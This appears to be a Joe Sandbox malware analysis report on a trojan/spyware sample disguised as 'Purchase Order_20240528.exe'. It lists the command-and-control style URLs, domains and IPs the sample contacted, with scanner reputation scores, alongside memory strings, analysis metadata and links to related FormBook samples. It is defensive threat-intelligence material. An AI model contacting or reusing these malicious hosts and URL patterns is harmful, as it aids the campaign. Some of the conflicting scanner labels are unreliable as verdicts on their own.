        www.dolcegusto-quiz.fun2%VirustotalBrowse
        www.etrading.cloud1%VirustotalBrowse
        www.vpachurch.org.uk4%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
        https://www.ecosia.org/newtab/0%URL Reputationsafe
        https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
        http://gmpg.org/xfn/110%URL Reputationsafe
        https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
        https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
        http://www.allgiftedmalaysia.com/dkdj/?5L0=2bCPy0&jTZPp=U2MbIDwYObql7+StDszk2IWvOqKP49Y4LLLXxrmKfStKROUY/qK9Zw3EJYAbIJoej5+11dDiuiwrzCxekQQ2SsNjLcEghxbMGsQSE4hdcQPQTWeOxMh44mhCIwJzKEDB4Xq2erE=0%Avira URL Cloudsafe
        https://twitter.com/hover0%Avira URL Cloudsafe
        https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
        https://www.instagram.com/hover_domains0%Avira URL Cloudsafe
        http://www.cuddle-paws.co.uk/zzbw/?5L0=2bCPy0&jTZPp=SYw/9+A27wDBBFVE9oOer+iKSaxo18ff/QICalIUdVK4tpmTGYvTJqWTGl/IZc6vUKz9bMfWLss6gerKkQ1b4agtfT85HThTdgJ4Gv37GO/tiVjy/t6jt5abgYoy/lcD8efQawI=0%Avira URL Cloudsafe
        http://www.adhdphotography.com/3gap/?jTZPp=25XBmjk0rqRaZkTkTD33T4OKGuWwQ/SEWL7mpnFDJER+MbRh/i2897KjaMR3WmWzMQOMItzOUFcJjK77+ET6PAxFDluhudTDf5JDha8/kN27L+7nUHVdmuvgnjQrBoWJDdvnsqo=&5L0=2bCPy00%Avira URL Cloudsafe
        https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js0%Avira URL Cloudsafe
        https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
        https://duckduckgo.com/ac/?q=0%VirustotalBrowse
        https://twitter.com/hover0%VirustotalBrowse
        http://www.etrading.cloud/gy0x/0%Avira URL Cloudsafe
        https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js0%Avira URL Cloudsafe
        http://www.vpachurch.org.uk/hx08/100%Avira URL Cloudmalware
        https://www.instagram.com/hover_domains0%VirustotalBrowse
        https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js0%VirustotalBrowse
        http://www.etrading.cloud/gy0x/?5L0=2bCPy0&jTZPp=q3tVqQVST/58pKcjgu6vzl4r/mjx+/3v5p1oiGGfWC80c0QmTZc7sue0joIh5TaOhvctfB+I4hP6RP0S+zGuZLn5ZOGHWIzMGtqXZLXUxKwwwvK+KKFBFwNnv8XJAo+gt0xcEPY=0%Avira URL Cloudsafe
        http://www.home-stroi0m.ru/l7wc/?jTZPp=rG0gXsVcMKnwL95DCAGLkXtixogTaqlVvgNhyV5MOQBbV9UvRUrQqDi5YjTtkNY5nkWwRtE2kxMBrn6VhlI+Nig16EK01wjkMFHIaUG8fjlX1oi4FBapVJcXf+AOShDHzPE0tCU=&5L0=2bCPy00%Avira URL Cloudsafe
        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
        http://www.vpachurch.org.uk/hx08/0%VirustotalBrowse
        http://www.mavonorm-global.uk/ia1k/0%Avira URL Cloudsafe
        https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js0%Avira URL Cloudsafe
        http://www.mavonorm-global.uk/ia1k/?5L0=2bCPy0&jTZPp=N7K37PwQwyq8WtMjD63BMb0ZEyGwsNHc8DxE6cCELPJHzMSs3RHBfzipjgIXVLm7nNAJX0ce6IW46RQAVIH59zJ0Pe4NazJJs+xz0T8fA0+K0n7VQeZLcDOWBXiB3y7ehLtrmgc=0%Avira URL Cloudsafe
        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
        http://www.shopnaya.fr/9rbi/0%Avira URL Cloudsafe
        http://www.home-stroi0m.ru/l7wc/0%Avira URL Cloudsafe
        https://www.shopnaya.fr/9rbi/?5L0=2bCPy0&jTZPp=UlNdZMK3GDRCBA0gS3f3uv0iXo0%Avira URL Cloudsafe
        http://www.etrading.cloud/gy0x/0%VirustotalBrowse
        https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js0%VirustotalBrowse
        https://www.google.com0%Avira URL Cloudsafe
        http://www.ceo-retreats.co.uk/5s1a/100%Avira URL Cloudmalware
        http://www.cuddle-paws.co.uk/zzbw/0%Avira URL Cloudsafe
        http://www.futurereadyteaming.com0%Avira URL Cloudsafe
        https://www.google.com0%VirustotalBrowse
        http://home-stroi0m.ru/l7wc/?jTZPp=rG0gXsVcMKnwL95DCAGLkXtixogTaqlVvgNhyV5MOQBbV9UvRUrQqDi5YjTtkNY5n0%Avira URL Cloudsafe
        http://www.mavonorm-global.uk/ia1k/1%VirustotalBrowse
        https://www.hover.com/domains/results0%Avira URL Cloudsafe
        http://www.shopnaya.fr/9rbi/0%VirustotalBrowse
        http://www.ceo-retreats.co.uk/5s1a/3%VirustotalBrowse
        http://www.vpachurch.org.uk/hx08/?jTZPp=+oCaj1A6qEgI197rJOt7Ie8wsT2QuaXvROrTbUaj/j401+U4/uihyXQLAHBQaX+oDSz5ZwQ8h3X94ZPhTrAPuKUxKp/Iu26MuBlEIc7q5Ez/5s4fDAcFIXmEd7qvwqTcBaCACgU=&5L0=2bCPy0100%Avira URL Cloudmalware
        http://www.cuddle-paws.co.uk/zzbw/0%VirustotalBrowse
        http://www.shortput.top/05xu/?jTZPp=ReZNC8TX9gJaOIK/BvITh+0FGwzFHm92bQvbNg62F2J0R8z5SuhCGDe2HN2Byu0BC7BKvHjRxIjSR8MFICml92wEl2DsCCajGT/6l7iIm8MBifF7wDoE5bE7ZGx4kkh6K6rbsW4=&5L0=2bCPy00%Avira URL Cloudsafe
        http://www.futurereadyteaming.com/d42u/0%Avira URL Cloudsafe
        https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js0%VirustotalBrowse
        http://mavonorm-global.uk/ia1k/?5L0=2bCPy0&jTZPp=N7K37PwQwyq8WtMjD63BMb0ZEyGwsNHc8DxE6cCELPJHzMSs3RH0%Avira URL Cloudsafe
        https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css0%Avira URL Cloudsafe
        https://www.hover.com/domains/results0%VirustotalBrowse
        http://www.shortput.top/05xu/0%Avira URL Cloudsafe
        http://www.allgiftedmalaysia.com/dkdj/0%Avira URL Cloudsafe
        http://www.shopnaya.fr/9rbi/?5L0=2bCPy0&jTZPp=UlNdZMK3GDRCBA0gS3f3uv0iXo+GpLYhxRIJfHdOWu/UoVzLYqkjSevahCA40rp7GDeAe0gS/eGNqMgOt0FXhd7M6VrSAWuVtivoglmtHt75iy7sMY8OQO52M7HjA3SJMCHiGMs=0%Avira URL Cloudsafe
        http://www.futurereadyteaming.com/d42u/?5L0=2bCPy0&jTZPp=Ze7qbULGym30DRtQWsDfUIjVKpc2N+ML3rKw6d8OwfGV5TB4Wy1SHsGQ3DzxzCIAckJPchaY62h3E/MXdBzELEbBfEli2wFapMH+8i0kZSl6sSBwn68EdR90A4BAIxslEVvZhZo=0%Avira URL Cloudsafe
        http://www.bade.ink/hsw0/0%Avira URL Cloudsafe
        http://www.ilodezu.com/07pn/?5L0=2bCPy0&jTZPp=CkfhBQ0terXRm+kmFpR39GSw1qHfnjo/tEzZ3zV38o+ejGSQGyq9lQZrlkGU0XQ7mu5ow3wpwcVqSHGJiQ9hplKQ2SOdF7l7JcVc6ChkY2r17h/XM0ANapemWrr0lME50EL+8pQ=100%Avira URL Cloudmalware
        http://www.adhdphotography.com/3gap/0%Avira URL Cloudsafe
        https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css0%VirustotalBrowse
        http://www.betopfloor.com/qy3g/0%Avira URL Cloudsafe
        http://www.allgiftedmalaysia.com/dkdj/0%VirustotalBrowse
        http://code.jquery.com/jquery-3.3.1.min.js0%Avira URL Cloudsafe
        http://www.ceo-retreats.co.uk/5s1a/?jTZPp=0jq67MNPRq4g2+jjEmEFgdmxU9xn3lZuU82S2yL3jkWaNmBkMCuTzs1oACp+jQZQfFcSAdfVUnty14PGpb+cvJdHxRsAacQFCcCRXvTpLBxg40F9NDu9hRQlsdpJQY/jGZexiU8=&5L0=2bCPy0100%Avira URL Cloudmalware
        http://www.adhdphotography.com/3gap/0%VirustotalBrowse
        http://code.jquery.com/jquery-3.3.1.min.js1%VirustotalBrowse
        http://www.shortput.top/05xu/1%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.bade.ink
        		149.88.84.60
        		truetrue
          		unknown
          vpachurch.org.uk
          		3.33.130.190
          		truetrueunknown
          www.shopnaya.fr
          		212.227.172.254
          		truetrueunknown
          www.ceo-retreats.co.uk
          		46.30.215.104
          		truetrue
            		unknown
            mavonorm-global.uk
            		92.205.15.157
            		truetrueunknown
            www.ilodezu.com
            		188.114.97.3
            		truefalse
              		unknown
              www.allgiftedmalaysia.com
              		216.40.34.41
              		truetrue
                		unknown
                cuddle-paws.co.uk
                		185.229.21.229
                		truetrue
                  		unknown
                  www.shortput.top
                  		203.161.43.227
                  		truetrue
                    		unknown
                    www.home-stroi0m.ru
                    		178.63.50.103
                    		truetrueunknown
                    betopfloor.com
                    		108.179.192.228
                    		truetrueunknown
                    adhdphotography.com
                    		76.223.67.189
                    		truetrueunknown
                    94950.bodis.com
                    		199.59.243.225
                    		truetrue
                      		unknown
                      futurereadyteaming.com
                      		3.33.130.190
                      		truetrue
                        		unknown
                        www.mavonorm-global.uk
                        		unknown
                        		unknowntrueunknown
                        www.dolcegusto-quiz.fun
                        		unknown
                        		unknowntrueunknown
                        www.betopfloor.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.cuddle-paws.co.uk
                          		unknown
                          		unknowntrue
                            		unknown
                            www.futurereadyteaming.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.adhdphotography.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.etrading.cloud
                                		unknown
                                		unknowntrueunknown
                                www.vpachurch.org.uk
                                		unknown
                                		unknowntrueunknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.allgiftedmalaysia.com/dkdj/?5L0=2bCPy0&jTZPp=U2MbIDwYObql7+StDszk2IWvOqKP49Y4LLLXxrmKfStKROUY/qK9Zw3EJYAbIJoej5+11dDiuiwrzCxekQQ2SsNjLcEghxbMGsQSE4hdcQPQTWeOxMh44mhCIwJzKEDB4Xq2erE=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.cuddle-paws.co.uk/zzbw/?5L0=2bCPy0&jTZPp=SYw/9+A27wDBBFVE9oOer+iKSaxo18ff/QICalIUdVK4tpmTGYvTJqWTGl/IZc6vUKz9bMfWLss6gerKkQ1b4agtfT85HThTdgJ4Gv37GO/tiVjy/t6jt5abgYoy/lcD8efQawI=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.adhdphotography.com/3gap/?jTZPp=25XBmjk0rqRaZkTkTD33T4OKGuWwQ/SEWL7mpnFDJER+MbRh/i2897KjaMR3WmWzMQOMItzOUFcJjK77+ET6PAxFDluhudTDf5JDha8/kN27L+7nUHVdmuvgnjQrBoWJDdvnsqo=&5L0=2bCPy0true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.etrading.cloud/gy0x/true
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.vpachurch.org.uk/hx08/true
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.etrading.cloud/gy0x/?5L0=2bCPy0&jTZPp=q3tVqQVST/58pKcjgu6vzl4r/mjx+/3v5p1oiGGfWC80c0QmTZc7sue0joIh5TaOhvctfB+I4hP6RP0S+zGuZLn5ZOGHWIzMGtqXZLXUxKwwwvK+KKFBFwNnv8XJAo+gt0xcEPY=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.home-stroi0m.ru/l7wc/?jTZPp=rG0gXsVcMKnwL95DCAGLkXtixogTaqlVvgNhyV5MOQBbV9UvRUrQqDi5YjTtkNY5nkWwRtE2kxMBrn6VhlI+Nig16EK01wjkMFHIaUG8fjlX1oi4FBapVJcXf+AOShDHzPE0tCU=&5L0=2bCPy0true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.mavonorm-global.uk/ia1k/true
                                • 1%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.mavonorm-global.uk/ia1k/?5L0=2bCPy0&jTZPp=N7K37PwQwyq8WtMjD63BMb0ZEyGwsNHc8DxE6cCELPJHzMSs3RHBfzipjgIXVLm7nNAJX0ce6IW46RQAVIH59zJ0Pe4NazJJs+xz0T8fA0+K0n7VQeZLcDOWBXiB3y7ehLtrmgc=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.shopnaya.fr/9rbi/true
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.home-stroi0m.ru/l7wc/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ceo-retreats.co.uk/5s1a/true
                                • 3%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.cuddle-paws.co.uk/zzbw/true
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.vpachurch.org.uk/hx08/?jTZPp=+oCaj1A6qEgI197rJOt7Ie8wsT2QuaXvROrTbUaj/j401+U4/uihyXQLAHBQaX+oDSz5ZwQ8h3X94ZPhTrAPuKUxKp/Iu26MuBlEIc7q5Ez/5s4fDAcFIXmEd7qvwqTcBaCACgU=&5L0=2bCPy0true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.shortput.top/05xu/?jTZPp=ReZNC8TX9gJaOIK/BvITh+0FGwzFHm92bQvbNg62F2J0R8z5SuhCGDe2HN2Byu0BC7BKvHjRxIjSR8MFICml92wEl2DsCCajGT/6l7iIm8MBifF7wDoE5bE7ZGx4kkh6K6rbsW4=&5L0=2bCPy0true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.futurereadyteaming.com/d42u/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.shortput.top/05xu/true
                                • 1%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.allgiftedmalaysia.com/dkdj/true
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.shopnaya.fr/9rbi/?5L0=2bCPy0&jTZPp=UlNdZMK3GDRCBA0gS3f3uv0iXo+GpLYhxRIJfHdOWu/UoVzLYqkjSevahCA40rp7GDeAe0gS/eGNqMgOt0FXhd7M6VrSAWuVtivoglmtHt75iy7sMY8OQO52M7HjA3SJMCHiGMs=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.futurereadyteaming.com/d42u/?5L0=2bCPy0&jTZPp=Ze7qbULGym30DRtQWsDfUIjVKpc2N+ML3rKw6d8OwfGV5TB4Wy1SHsGQ3DzxzCIAckJPchaY62h3E/MXdBzELEbBfEli2wFapMH+8i0kZSl6sSBwn68EdR90A4BAIxslEVvZhZo=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.bade.ink/hsw0/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ilodezu.com/07pn/?5L0=2bCPy0&jTZPp=CkfhBQ0terXRm+kmFpR39GSw1qHfnjo/tEzZ3zV38o+ejGSQGyq9lQZrlkGU0XQ7mu5ow3wpwcVqSHGJiQ9hplKQ2SOdF7l7JcVc6ChkY2r17h/XM0ANapemWrr0lME50EL+8pQ=false
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.adhdphotography.com/3gap/true
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.betopfloor.com/qy3g/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ceo-retreats.co.uk/5s1a/?jTZPp=0jq67MNPRq4g2+jjEmEFgdmxU9xn3lZuU82S2yL3jkWaNmBkMCuTzs1oACp+jQZQfFcSAdfVUnty14PGpb+cvJdHxRsAacQFCcCRXvTpLBxg40F9NDu9hRQlsdpJQY/jGZexiU8=&5L0=2bCPy0true
                                • Avira URL Cloud: malware
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabnslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://twitter.com/hovernslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.instagram.com/hover_domainsnslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.jsnslookup.exe, 00000005.00000002.4540879237.0000000004A56000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003D06000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.jsnslookup.exe, 00000005.00000002.4540879237.0000000004A56000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003D06000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.jsnslookup.exe, 00000005.00000002.4540879237.0000000004A56000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003D06000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.ecosia.org/newtab/nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.chiark.greenend.org.uk/~sgtatham/putty/0Purchase Order_20240528.exefalse
                                • URL Reputation: safe
                                		unknown
                                http://gmpg.org/xfn/11nslookup.exe, 00000005.00000002.4540879237.0000000004F0C000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.00000000041BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.shopnaya.fr/9rbi/?5L0=2bCPy0&jTZPp=UlNdZMK3GDRCBA0gS3f3uv0iXonslookup.exe, 00000005.00000002.4540879237.0000000003F58000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003208000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ac.ecosia.org/autocomplete?q=nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.google.comnslookup.exe, 00000005.00000002.4540879237.000000000427C000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.000000000352C000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.futurereadyteaming.comqFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4541673061.0000000004FA7000.00000040.80000000.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://home-stroi0m.ru/l7wc/?jTZPp=rG0gXsVcMKnwL95DCAGLkXtixogTaqlVvgNhyV5MOQBbV9UvRUrQqDi5YjTtkNY5nnslookup.exe, 00000005.00000002.4540879237.0000000004D7A000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.000000000402A000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.hover.com/domains/resultsnslookup.exe, 00000005.00000002.4542576298.0000000006080000.00000004.00000800.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4540879237.00000000048C4000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003B74000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://mavonorm-global.uk/ia1k/?5L0=2bCPy0&jTZPp=N7K37PwQwyq8WtMjD63BMb0ZEyGwsNHc8DxE6cCELPJHzMSs3RHnslookup.exe, 00000005.00000002.4540879237.00000000045A0000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003850000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.cssnslookup.exe, 00000005.00000002.4540879237.0000000004A56000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.0000000003D06000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=nslookup.exe, 00000005.00000002.4542692727.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://code.jquery.com/jquery-3.3.1.min.jsnslookup.exe, 00000005.00000002.4540879237.0000000004F0C000.00000004.10000000.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000002.4539724244.00000000041BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • 1%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                76.223.67.189
                                		adhdphotography.comUnited States
                                		16509AMAZON-02UStrue
                                46.30.215.104
                                		www.ceo-retreats.co.ukDenmark
                                		51468ONECOMDKtrue
                                92.205.15.157
                                		mavonorm-global.ukGermany
                                		8972GD-EMEA-DC-SXB1DEtrue
                                199.59.243.225
                                		94950.bodis.comUnited States
                                		395082BODIS-NJUStrue
                                149.88.84.60
                                		www.bade.inkUnited States
                                		188SAIC-ASUStrue
                                185.229.21.229
                                		cuddle-paws.co.ukUnited Kingdom
                                		25577C4L-ASGBtrue
                                108.179.192.228
                                		betopfloor.comUnited States
                                		46606UNIFIEDLAYER-AS-1UStrue
                                188.114.97.3
                                		www.ilodezu.comEuropean Union
                                		13335CLOUDFLARENETUSfalse
                                203.161.43.227
                                		www.shortput.topMalaysia
                                		45899VNPT-AS-VNVNPTCorpVNtrue
                                178.63.50.103
                                		www.home-stroi0m.ruGermany
                                		24940HETZNER-ASDEtrue
                                3.33.130.190
                                		vpachurch.org.ukUnited States
                                		8987AMAZONEXPANSIONGBtrue
                                212.227.172.254
                                		www.shopnaya.frGermany
                                		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                216.40.34.41
                                		www.allgiftedmalaysia.comCanada
                                		15348TUCOWSCAtrue

                                General Information

                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1448264
                                Start date and time:2024-05-28 07:14:05 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 11m 3s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:10
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:2
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:Purchase Order_20240528.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@7/2@15/13
                                EGA Information:
                                • Successful, ratio: 75%
                                HCA Information:
                                • Successful, ratio: 89%
                                • Number of executed functions: 90
                                • Number of non-executed functions: 313
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • Report creation exceeded maximum time and may have missing disassembly code information.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                01:14:50API Interceptor1x Sleep call for process: Purchase Order_20240528.exe modified
                                01:15:43API Interceptor12646281x Sleep call for process: nslookup.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                76.223.67.189USD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                • www.playmosa.com/lb7u/
                                USD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                • www.playmosa.com/lb7u/
                                Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • www.adhdphotography.com/l3cl/
                                d35g770B2W.exeGet hashmaliciousFormBookBrowse
                                • www.adhdphotography.com/jq7v/?2fO8I=F+PnPgBqhy+5gLplugNLQuxMSKWZRNjY16Ci7xfpcCs5brxdOTL4CnXWejTXATFRgRxd+vj9d4oU3oxew7ebDbPUoIkPCJOocR1/d6VNrq7Mfg4buJTsmg4=&LDYd_=QZ64
                                Purchase Order_17052024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • www.adhdphotography.com/3gap/
                                Purchase Order_21052024.exeGet hashmaliciousFormBookBrowse
                                • www.adhdphotography.com/3gap/
                                nPLN.exeGet hashmaliciousFormBookBrowse
                                • www.adhdphotography.com/3gap/
                                Konstabelens65.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • www.osbornesargent.co.uk/md49/
                                Purchase Order_20240516.exeGet hashmaliciousFormBookBrowse
                                • www.adhdphotography.com/3gap/
                                G7DzDN2VcB.exeGet hashmaliciousFormBookBrowse
                                • www.adhdphotography.com/q0r6/
                                46.30.215.104Purchase Order_17052024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • www.ceo-retreats.co.uk/5s1a/
                                Purchase Order_21052024.exeGet hashmaliciousFormBookBrowse
                                • www.ceo-retreats.co.uk/5s1a/
                                nPLN.exeGet hashmaliciousFormBookBrowse
                                • www.ceo-retreats.co.uk/5s1a/
                                Purchase Order_20240516.exeGet hashmaliciousFormBookBrowse
                                • www.ceo-retreats.co.uk/5s1a/
                                92.205.15.157Purchase Order_17052024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • www.mavonorm-global.uk/ia1k/
